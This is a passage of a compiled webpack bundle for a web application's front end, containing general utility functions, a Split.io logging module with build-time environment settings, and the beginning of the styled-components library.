webpackJsonp([39],[
/* 0 */,
/* 1 */,
/* 2 */,
/* 3 */,
/* 4 */,
/* 5 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
Object.defineProperty(__webpack_exports__, "__esModule", { value: true });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "toBase64", function() { return toBase64; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "fromBase64", function() { return fromBase64; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "encodeId", function() { return encodeId; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "getQueryParams", function() { return getQueryParams; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "decodeIndicatorId", function() { return decodeIndicatorId; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "toLower", function() { return toLower; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "toUpper", function() { return toUpper; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "capitalize", function() { return capitalize; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "isImmutable", function() { return isImmutable; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "alphabetizeByKey", function() { return alphabetizeByKey; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "alphabetize", function() { return alphabetize; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "querystring", function() { return querystring; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "fromJS", function() { return fromJS; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "isObject", function() { return isObject; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "isPlainObj", function() { return isPlainObj; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "isMapLike", function() { return isMapLike; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "isListLike", function() { return isListLike; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "saveTextToFile", function() { return saveTextToFile; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "getterFromKeyPath", function() { return getterFromKeyPath; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "pickImmutable", function() { return pickImmutable; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "normalizeType", function() { return normalizeType; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "getType", function() { return getType; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "getPriorityLevel", function() { return getPriorityLevel; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "getCsrfToken", function() { return getCsrfToken; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "parseCsrfToken", function() { return parseCsrfToken; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "listToOrderedMap", function() { return listToOrderedMap; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "mergeState", function() { return mergeState; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "get", function() { return get; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "parseServerErrorMessage", function() { return parseServerErrorMessage; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_querystring__ = __webpack_require__(119);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_querystring___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_0_querystring__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_immutable__ = __webpack_require__(1);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2_ramda_src_curry__ = __webpack_require__(197);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2_ramda_src_curry___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_2_ramda_src_curry__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3_ramda_src_contains__ = __webpack_require__(1115);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3_ramda_src_contains___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_3_ramda_src_contains__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_4_ramda_src_ifElse__ = __webpack_require__(1129);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_4_ramda_src_ifElse___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_4_ramda_src_ifElse__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_5_ramda_src_map__ = __webpack_require__(101);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_5_ramda_src_map___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_5_ramda_src_map__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_6_ramda_src_trim__ = __webpack_require__(1152);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_6_ramda_src_trim___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_6_ramda_src_trim__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_7_ramda_src_compose__ = __webpack_require__(265);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_7_ramda_src_compose___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_7_ramda_src_compose__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_8_ramda_src_concat__ = __webpack_require__(461);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_8_ramda_src_concat___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_8_ramda_src_concat__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_9_ramda_src_head__ = __webpack_require__(1128);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_9_ramda_src_head___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_9_ramda_src_head__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_10_ramda_src_tail__ = __webpack_require__(459);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_10_ramda_src_tail___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_10_ramda_src_tail__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_11_ramda_src_always__ = __webpack_require__(228);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_11_ramda_src_always___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_11_ramda_src_always__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_12_ramda_src_prop__ = __webpack_require__(323);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_12_ramda_src_prop___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_12_ramda_src_prop__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_13_ramda_src_defaultTo__ = __webpack_require__(640);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_13_ramda_src_defaultTo___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_13_ramda_src_defaultTo__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_14_ramda_src_pick__ = __webpack_require__(1144);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_14_ramda_src_pick___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_14_ramda_src_pick__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_15_ramda_src_pipe__ = __webpack_require__(638);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_15_ramda_src_pipe___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_15_ramda_src_pipe__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_16_ramda_src_path__ = __webpack_require__(231);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_16_ramda_src_path___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_16_ramda_src_path__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_17_file_saver__ = __webpack_require__(899);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_17_file_saver___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_17_file_saver__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_18_bowser__ = __webpack_require__(328);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_18_bowser___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_18_bowser__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_19__fp__ = __webpack_require__(109);
var _typeof = typeof Symbol === "function" && typeof Symbol.iterator === "symbol" ? function (obj) { return typeof obj; } : function (obj) { return obj && typeof Symbol === "function" && obj.constructor === Symbol && obj !== Symbol.prototype ? "symbol" : typeof obj; };























/**
 * We could import this from ramda... but it's such a straightforward function.
 */
var identity = function identity(x) {
  return x;
};

var Base64 = {
  to: function to(x) {
    return window.btoa(x);
  },
  from: function from(x) {
    return window.atob(x);
  }
};

// I created these partly for semantic reasons and partially because they are
// dangerous. At least atob can throw if called on a malformed string.
var toBase64 = __WEBPACK_IMPORTED_MODULE_7_ramda_src_compose___default()(__WEBPACK_IMPORTED_MODULE_5_ramda_src_map___default()(__WEBPACK_IMPORTED_MODULE_7_ramda_src_compose___default()(__WEBPACK_IMPORTED_MODULE_6_ramda_src_trim___default.a, Base64.to, encodeURIComponent)), __WEBPACK_IMPORTED_MODULE_19__fp__["IO"].of);
var fromBase64 = __WEBPACK_IMPORTED_MODULE_7_ramda_src_compose___default()(__WEBPACK_IMPORTED_MODULE_5_ramda_src_map___default()(__WEBPACK_IMPORTED_MODULE_7_ramda_src_compose___default()(__WEBPACK_IMPORTED_MODULE_6_ramda_src_trim___default.a, decodeURIComponent, Base64.from)), __WEBPACK_IMPORTED_MODULE_19__fp__["IO"].of);

// Encode an id to Base 64 to be a valid URL
var encodeId = function encodeId(id) {
  var encode = __WEBPACK_IMPORTED_MODULE_4_ramda_src_ifElse___default()(__WEBPACK_IMPORTED_MODULE_3_ramda_src_contains___default()('|'), function (id) {
    return toBase64(id).foldOr(function (err) {
      console.warn('Could not encode ID - "' + id + '"', err);
      return '#';
    });
  }, identity);
  return encode(id);
};

/**
 * Given an object or immutable keyed collection return the standard set of
 * params used when querying endpoints. Many of our stores hold an Options
 * record that contains both query params and also display params that are never
 * meant to be sent to the server. This function was created to standardize
 * getting the subset of params that are meant for the server.
 */
var getQueryParams = __WEBPACK_IMPORTED_MODULE_15_ramda_src_pipe___default()(__WEBPACK_IMPORTED_MODULE_13_ramda_src_defaultTo___default()({}), function (x) {
  return typeof x.toJS === 'function' ? x.toJS() : x;
}, __WEBPACK_IMPORTED_MODULE_14_ramda_src_pick___default()(['query', 'sortBy', 'sortOrder', 'startPage', 'pageSize', 'companyId', 'companyGuid', 'simpleFetch', 'pageNumber']));

/**
 *
 * All indicator URLs should be base64 encoded, but in order to provide
 * backwards compat for any URLs our customers have bookmarked before this
 * change.
 *
 * Will fold left on unsuccessful decode. I.e.
 * decodeIndicatorId('a-b').fold(() => 'i will be called', () => 'i will not')
 */
var decodeIndicatorId = function decodeIndicatorId(id) {
  return __WEBPACK_IMPORTED_MODULE_19__fp__["IO"].of(id).map(decodeURIComponent) // This is the legacy support
  .chain(function (x) {
    return x.includes('|') ? __WEBPACK_IMPORTED_MODULE_19__fp__["IO"].of(x) : fromBase64(id);
  }) // If found pipe, assume successful decode
  .map(function (x) {
    if (!x.includes('|')) {
      throw new Error('"' + id + '" does not appear to be a valid encoded indicator id');
    } else {
      return x;
    }
  });
};

/**
 * NOTE: We currently have a number of util files floating around. We will
 * eventually move more and more of those utils to this file so that they can be
 * imported simply from any file.
 */

/**
 * Less error-prone versions of toLower and toUpper.
 */
var toLower = function toLower(x) {
  var notDefinedValue = arguments.length > 1 && arguments[1] !== undefined ? arguments[1] : '';
  return __WEBPACK_IMPORTED_MODULE_19__fp__["IO"].of(x).map(function (x) {
    return x.toLowerCase();
  }).fold(__WEBPACK_IMPORTED_MODULE_11_ramda_src_always___default()(notDefinedValue), identity);
};

var toUpper = function toUpper(x) {
  var notDefinedValue = arguments.length > 1 && arguments[1] !== undefined ? arguments[1] : '';
  return __WEBPACK_IMPORTED_MODULE_19__fp__["IO"].of(x).map(function (x) {
    return x.toUpperCase();
  }).fold(__WEBPACK_IMPORTED_MODULE_11_ramda_src_always___default()(notDefinedValue), identity);
};

var capitalize = function capitalize(str) {
  return __WEBPACK_IMPORTED_MODULE_8_ramda_src_concat___default()(toUpper(__WEBPACK_IMPORTED_MODULE_9_ramda_src_head___default()(str)), __WEBPACK_IMPORTED_MODULE_10_ramda_src_tail___default()(str));
};

var isImmutable = function isImmutable(x) {
  return __WEBPACK_IMPORTED_MODULE_1_immutable__["Iterable"].isIterable(x);
};

/**
 * Alphabetically sort two Immutable Objects based on some key
 */
var alphabetizeByKey = function alphabetizeByKey(key) {
  return function (a, b) {
    if (!__WEBPACK_IMPORTED_MODULE_1_immutable__["Iterable"].isIterable(a) || !__WEBPACK_IMPORTED_MODULE_1_immutable__["Iterable"].isIterable(b)) return 0;
    var firstName = toLower(a.get(key));
    var secondName = toLower(b.get(key));
    if (firstName < secondName) return -1;
    if (firstName > secondName) return 1;
    return 0;
  };
};

/**
 * NOTE: This is exported as alphabetize to maintain compatibility with parts of
 * the codebase that rely on this.
 */
var alphabetize = alphabetizeByKey('name');

var querystring = __WEBPACK_IMPORTED_MODULE_2_ramda_src_curry___default()(function (obj, url) {
  return url + '?' + Object(__WEBPACK_IMPORTED_MODULE_0_querystring__["stringify"])(obj);
});

var fromJS = __WEBPACK_IMPORTED_MODULE_2_ramda_src_curry___default()(function (reviver, x) {
  return Object(__WEBPACK_IMPORTED_MODULE_1_immutable__["fromJS"])(x, reviver);
});

/**
 * Match the behavior of lodash's `isObject`. Note that many things are
 * considered objects by the user of typeof, so if you want something of the
 * form `{}` then use isPlainObject below
 */
var isObject = function isObject(x) {
  return x != null && ((typeof x === 'undefined' ? 'undefined' : _typeof(x)) === 'object' || typeof x === 'function');
};

/**
 * Determine of something is a plain object
 */
var isPlainObj = function isPlainObj(x) {
  return !!x && (x.constructor === Object || x.constructor === undefined);
};

var isMapLike = function isMapLike(x) {
  return isPlainObj(x) || __WEBPACK_IMPORTED_MODULE_1_immutable__["Iterable"].isKeyed(x);
};

var isListLike = function isListLike(x) {
  return Array.isArray(x) || __WEBPACK_IMPORTED_MODULE_1_immutable__["Iterable"].isIndexed(x);
};

/**
 * Given a string of text save it to a file on the users computer.
 */
var saveTextToFile = function saveTextToFile(filename, text) {
  var blob = new Blob([text], {
    type: __WEBPACK_IMPORTED_MODULE_18_bowser___default.a.safari ? 'application/octet-stream' : 'text/plain;charset=utf-8'
  });
  return Object(__WEBPACK_IMPORTED_MODULE_17_file_saver__["saveAs"])(blob, filename);
};

var getterFromKeyPath = function getterFromKeyPath(keyPath, notFoundValue) {
  return function (state) {
    return state.getIn(keyPath, notFoundValue);
  };
};

/**
 * Like a standad pick, but it works on immutable maps. Give an array of keys,
 * and it will return an object which is a subset of the original argument
 * containing only the keys you specify.
 */
var pickImmutable = __WEBPACK_IMPORTED_MODULE_2_ramda_src_curry___default()(function (keys, map) {
  return keys.reduce(function (agg, k) {
    return agg.set(k, map.get(k));
  }, Object(__WEBPACK_IMPORTED_MODULE_1_immutable__["Map"])());
});

var normalizeType = function normalizeType(type) {
  return __WEBPACK_IMPORTED_MODULE_19__fp__["IO"].of(type).map(toLower).foldOr(function () {
    return 'undefined';
  });
};

var getType = function getType(d) {
  return __WEBPACK_IMPORTED_MODULE_19__fp__["IO"].of(d).map(__WEBPACK_IMPORTED_MODULE_12_ramda_src_prop___default()('type')).map(normalizeType).foldOr(function () {
    return 'undefined';
  });
};

var getPriorityLevel = function getPriorityLevel(d) {
  return __WEBPACK_IMPORTED_MODULE_19__fp__["IO"].of(d).map(__WEBPACK_IMPORTED_MODULE_12_ramda_src_prop___default()('priorityLevel')).map(toLower).foldOr(function () {
    return 'undefined';
  });
};

/**
 * A quick helper to grab the csrf token from the cookie.
 */
var getCsrfToken = function getCsrfToken() {
  return parseCsrfToken(document.cookie);
};

/**
 * Parse CSRF token from a cookie string.
 */
var parseCsrfToken = function parseCsrfToken(cookies) {
  var cookiesMap = cookies.split(';').map(function (x) {
    return x.trim().split('=');
  }).reduce(function (a, b) {
    a[b[0]] = b[1];
    return a;
  }, {});
  return cookiesMap['XSRF-TOKEN'];
};

var listToOrderedMap = function listToOrderedMap(idKey) {
  return function (list) {
    return Object(__WEBPACK_IMPORTED_MODULE_1_immutable__["List"])(list).toOrderedMap().mapKeys(function (k, v) {
      return v[idKey];
    });
  };
};

/**
 * A helper for using functional state updates in react. I.e. state => newState.
 * This function allows composing multiple state update functions, much like
 * pipe or compose from ramda.
 *
 * TODO: Would it make sense to allow this to handle plain objects as well?
 */

var mergeState = function mergeState() {
  for (var _len = arguments.length, fns = Array(_len), _key = 0; _key < _len; _key++) {
    fns[_key] = arguments[_key];
  }

  return function (state, props) {
    var result = {};

    // Could do this with reduce, but this seemed more readable to me. It's fine
    // that we mutate result since we created it here
    fns.forEach(function (fn) {
      Object.assign(result, fn(state, props));
    });

    return result;
  };
};

/**
 * A getter for objects AND immutable collections
 *
 * Second argument is optional and mimics the behavior of Immutable collections:
 * I the key is not found then the notSetValue will be returned instead. This is
 * an important distinction, since if the key is present and the value is
 * undefined then undefined will still be returned regardless of notSetValue.
 */
var get = function get(key) {
  var notSetValue = arguments.length > 1 && arguments[1] !== undefined ? arguments[1] : undefined;
  return function (collection) {
    if (isImmutable(collection)) {
      return collection.get(key, notSetValue);
    } else {
      return collection.hasOwnProperty(key) ? collection[key] : notSetValue;
    }
  };
};

/**
 * Helper to parse a error and extract the server created error message where appropriate. Otherwise,
 * returns a default or alternative error message.
 */
var parseServerErrorMessage = function parseServerErrorMessage(error) {
  var alternative = arguments.length > 1 && arguments[1] !== undefined ? arguments[1] : 'An error occurred.';

  var message = void 0;

  if (!error) return alternative;

  var status = error.status;


  if (status && status >= 400 && status <= 500) {
    message = __WEBPACK_IMPORTED_MODULE_16_ramda_src_path___default()(['xhr', 'response', 'message'], error);
  }

  return message || alternative;
};

/***/ }),
/* 6 */,
/* 7 */,
/* 8 */,
/* 9 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* WEBPACK VAR INJECTION */(function(process) {/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "a", function() { return API; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0__LoggerFactory__ = __webpack_require__(1272);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1__localstorage_isAvailable__ = __webpack_require__(1273);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2__lang__ = __webpack_require__(13);
/**
Copyright 2016 Split Software

Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at

    http://www.apache.org/licenses/LICENSE-2.0

Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
**/




var isLogLevelString = function isLogLevelString(str) {
  return !!Object(__WEBPACK_IMPORTED_MODULE_2__lang__["b" /* find */])(__WEBPACK_IMPORTED_MODULE_0__LoggerFactory__["a" /* LogLevels */], function (lvl) {
    return str === lvl;
  });
};

var defaultOptions = {
  showLevel: true,
  displayAllErrors: false
};
var LS_KEY = 'splitio_debug';
var ENV_VAR_KEY = 'SPLITIO_DEBUG';
var isNode = false; // We check for version truthiness since most shims will have that as empty string.

if (typeof process !== 'undefined' && typeof process.version !== 'undefined' && !!process.version) {
  isNode = true;
}

var initialState = String(isNode ? Object({"SERVICES_APTRINSIC_ENABLED":true,"SERVICES_NEW_RELIC_ENABLED":false,"SERVICES_SENTRY_ENABLED":true,"NODE_ENV":"production","ENV":"production","TRUSTAR_API_HOST":undefined,"TRUSTAR_STATION_HOST":undefined,"SPLIT_AUTHORIZATION_KEY":"7iki1574js01dvm0oq3kaaj3755bj02lgaeo","__VERSION__":"v5.2.3-23-gdec5e66"})[ENV_VAR_KEY] : Object(__WEBPACK_IMPORTED_MODULE_1__localstorage_isAvailable__["a" /* default */])() ? localStorage.getItem(LS_KEY) : '');

var createLog = function createLog(namespace, options) {
  if (options === void 0) {
    options = {};
  }

  return new __WEBPACK_IMPORTED_MODULE_0__LoggerFactory__["b" /* Logger */](namespace, Object(__WEBPACK_IMPORTED_MODULE_2__lang__["k" /* merge */])(options, defaultOptions));
};

var ownLog = createLog('splitio-utils:logger');
/**
 * The public Logger utility API.
 */

var API = {
  /**
   * Enables all the logs.
   */
  enable: function enable() {
    Object(__WEBPACK_IMPORTED_MODULE_0__LoggerFactory__["c" /* setLogLevel */])(__WEBPACK_IMPORTED_MODULE_0__LoggerFactory__["a" /* LogLevels */].DEBUG);
  },

  /**
   * Sets a custom log Level for the SDK.
   * @param {string} logLevel - Custom LogLevel value.
   */
  setLogLevel: function setLogLevel(logLevel) {
    if (isLogLevelString(logLevel)) {
      Object(__WEBPACK_IMPORTED_MODULE_0__LoggerFactory__["c" /* setLogLevel */])(logLevel);
    } else {
      ownLog.error('Invalid Log Level - No changes to the logs will be applied.');
    }
  },

  /**
   * Disables all the log levels.
   */
  disable: function disable() {
    // Disabling is equal logLevel none
    Object(__WEBPACK_IMPORTED_MODULE_0__LoggerFactory__["c" /* setLogLevel */])(__WEBPACK_IMPORTED_MODULE_0__LoggerFactory__["a" /* LogLevels */].NONE);
  },

  /**
   * Exposed for usage with setLogLevel
   */
  LogLevel: __WEBPACK_IMPORTED_MODULE_0__LoggerFactory__["a" /* LogLevels */]
}; // "enable", "enabled" and "on", are synonims with 'DEBUG' loglevel

if (/^(enabled?|on)/i.test(initialState)) {
  API.enable(__WEBPACK_IMPORTED_MODULE_0__LoggerFactory__["a" /* LogLevels */].DEBUG);
} else if (isLogLevelString(initialState)) {
  API.setLogLevel(initialState);
} else {
  // By default it starts disabled.
  API.disable();
} // By default we expose logger instance creator wrapper.


/* harmony default export */ __webpack_exports__["b"] = (createLog);
/* WEBPACK VAR INJECTION */}.call(__webpack_exports__, __webpack_require__(83)))

/***/ }),
/* 10 */,
/* 11 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* WEBPACK VAR INJECTION */(function(process, module) {/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "b", function() { return css; });
/* unused harmony export keyframes */
/* unused harmony export injectGlobal */
/* unused harmony export isStyledComponent */
/* unused harmony export consolidateStreamedStyles */
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "a", function() { return ThemeProvider; });
/* unused harmony export withTheme */
/* unused harmony export ServerStyleSheet */
/* unused harmony export StyleSheetManager */
/* unused harmony export __DO_NOT_USE_OR_YOU_WILL_BE_HAUNTED_BY_SPOOKY_GHOSTS */
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_fbjs_lib_hyphenateStyleName__ = __webpack_require__(3446);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_fbjs_lib_hyphenateStyleName___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_0_fbjs_lib_hyphenateStyleName__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_react__ = __webpack_require__(0);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_react___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_1_react__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2_stylis__ = __webpack_require__(3448);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2_stylis___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_2_stylis__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3_stylis_rule_sheet__ = __webpack_require__(3449);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3_stylis_rule_sheet___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_3_stylis_rule_sheet__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_4_prop_types__ = __webpack_require__(3450);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_4_prop_types___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_4_prop_types__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_5_hoist_non_react_statics__ = __webpack_require__(3453);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_5_hoist_non_react_statics___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_5_hoist_non_react_statics__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_6_react_is__ = __webpack_require__(651);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_6_react_is___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_6_react_is__);








var _typeof = typeof Symbol === "function" && typeof Symbol.iterator === "symbol" ? function (obj) {
  return typeof obj;
} : function (obj) {
  return obj && typeof Symbol === "function" && obj.constructor === Symbol && obj !== Symbol.prototype ? "symbol" : typeof obj;
};

var classCallCheck = function (instance, Constructor) {
  if (!(instance instanceof Constructor)) {
    throw new TypeError("Cannot call a class as a function");
  }
};

var createClass = function () {
  function defineProperties(target, props) {
    for (var i = 0; i < props.length; i++) {
      var descriptor = props[i];
      descriptor.enumerable = descriptor.enumerable || false;
      descriptor.configurable = true;
      if ("value" in descriptor) descriptor.writable = true;
      Object.defineProperty(target, descriptor.key, descriptor);
    }
  }

  return function (Constructor, protoProps, staticProps) {
    if (protoProps) defineProperties(Constructor.prototype, protoProps);
    if (staticProps) defineProperties(Constructor, staticProps);
    return Constructor;
  };
}();

var _extends = Object.assign || function (target) {
  for (var i = 1; i < arguments.length; i++) {
    var source = arguments[i];

    for (var key in source) {
      if (Object.prototype.hasOwnProperty.call(source, key)) {
        target[key] = source[key];
      }
    }
  }

  return target;
};

var inherits = function (subClass, superClass) {
  if (typeof superClass !== "function" && superClass !== null) {
    throw new TypeError("Super expression must either be null or a function, not " + typeof superClass);
  }

  subClass.prototype = Object.create(superClass && superClass.prototype, {
    constructor: {
      value: subClass,
      enumerable: false,
      writable: true,
      configurable: true
    }
  });
  if (superClass) Object.setPrototypeOf ? Object.setPrototypeOf(subClass, superClass) : subClass.__proto__ = superClass;
};

var objectWithoutProperties = function (obj, keys) {
  var target = {};

  for (var i in obj) {
    if (keys.indexOf(i) >= 0) continue;
    if (!Object.prototype.hasOwnProperty.call(obj, i)) continue;
    target[i] = obj[i];
  }

  return target;
};

var possibleConstructorReturn = function (self, call) {
  if (!self) {
    throw new ReferenceError("this hasn't been initialised - super() hasn't been called");
  }

  return call && (typeof call === "object" || typeof call === "function") ? call : self;
};

// 
var isPlainObject = (function (x) {
  return (typeof x === 'undefined' ? 'undefined' : _typeof(x)) === 'object' && x.constructor === Object;
});

// 


/**
 * Parse errors.md and turn it into a simple hash of code: message
 */
var ERRORS =  false ? {
  "1": "Cannot create styled-component for component: %s.\n\n",
  "2": "Can't collect styles once you've consumed a `ServerStyleSheet`'s styles! `ServerStyleSheet` is a one off instance for each server-side render cycle.\n\n* Are you trying to reuse it across renders?\n* Are you accidentally calling collectStyles twice?\n\n",
  "3": "Streaming SSR is only supported in a Node.js environment; Please do not try to call this method in the browser.\n\n",
  "4": "The `StyleSheetManager` expects a valid target or sheet prop!\n\n* Does this error occur on the client and is your target falsy?\n* Does this error occur on the server and is the sheet falsy?\n\n",
  "5": "The clone method cannot be used on the client!\n\n* Are you running in a client-like environment on the server?\n* Are you trying to run SSR on the client?\n\n",
  "6": "Trying to insert a new style tag, but the given Node is unmounted!\n\n* Are you using a custom target that isn't mounted?\n* Does your document not have a valid head element?\n* Have you accidentally removed a style tag manually?\n\n",
  "7": "ThemeProvider: Please return an object from your \"theme\" prop function, e.g.\n\n```js\ntheme={() => ({})}\n```\n\n",
  "8": "ThemeProvider: Please make your \"theme\" prop an object.\n\n",
  "9": "Missing document `<head>`\n\n",
  "10": "Cannot find a StyleSheet instance. Usually this happens if there are multiple copies of styled-components loaded at once. Check out this issue for how to troubleshoot and fix the common cases where this situation can happen: https://github.com/styled-components/styled-components/issues/1941#issuecomment-417862021\n\n",
  "11": "A plain React class (%s) has been interpolated into styles, probably as a component selector (https://www.styled-components.com/docs/advanced#referring-to-other-components). Only styled-component classes can be targeted in this fashion."
} : {};

/**
 * super basic version of sprintf
 */
function format() {
  for (var _len = arguments.length, args = Array(_len), _key = 0; _key < _len; _key++) {
    args[_key] = arguments[_key];
  }

  var a = args[0];
  var b = [];
  var c = void 0;

  for (c = 1; c < args.length; c += 1) {
    b.push(args[c]);
  }

  b.forEach(function (d) {
    a = a.replace(/%[a-z]/, d);
  });

  return a;
}

/**
 * Create an error file out of errors.md for development and a simple web link to the full errors
 * in production mode.
 */

var StyledComponentsError = function (_Error) {
  inherits(StyledComponentsError, _Error);

  function StyledComponentsError(code) {
    classCallCheck(this, StyledComponentsError);

    for (var _len2 = arguments.length, interpolations = Array(_len2 > 1 ? _len2 - 1 : 0), _key2 = 1; _key2 < _len2; _key2++) {
      interpolations[_key2 - 1] = arguments[_key2];
    }

    if (true) {
      var _this = possibleConstructorReturn(this, _Error.call(this, 'An error occurred. See https://github.com/styled-components/styled-components/blob/master/src/utils/errors.md#' + code + ' for more information. ' + (interpolations ? 'Additional arguments: ' + interpolations.join(', ') : '')));
    } else {
      var _this = possibleConstructorReturn(this, _Error.call(this, format.apply(undefined, [ERRORS[code]].concat(interpolations))));
    }
    return possibleConstructorReturn(_this);
  }

  return StyledComponentsError;
}(Error);

// 

var objToCss = function objToCss(obj, prevKey) {
  var css = Object.keys(obj).filter(function (key) {
    var chunk = obj[key];
    return chunk !== undefined && chunk !== null && chunk !== false && chunk !== '';
  }).map(function (key) {
    if (isPlainObject(obj[key])) return objToCss(obj[key], key);
    return __WEBPACK_IMPORTED_MODULE_0_fbjs_lib_hyphenateStyleName___default()(key) + ': ' + obj[key] + ';';
  }).join(' ');
  return prevKey ? prevKey + ' {\n  ' + css + '\n}' : css;
};

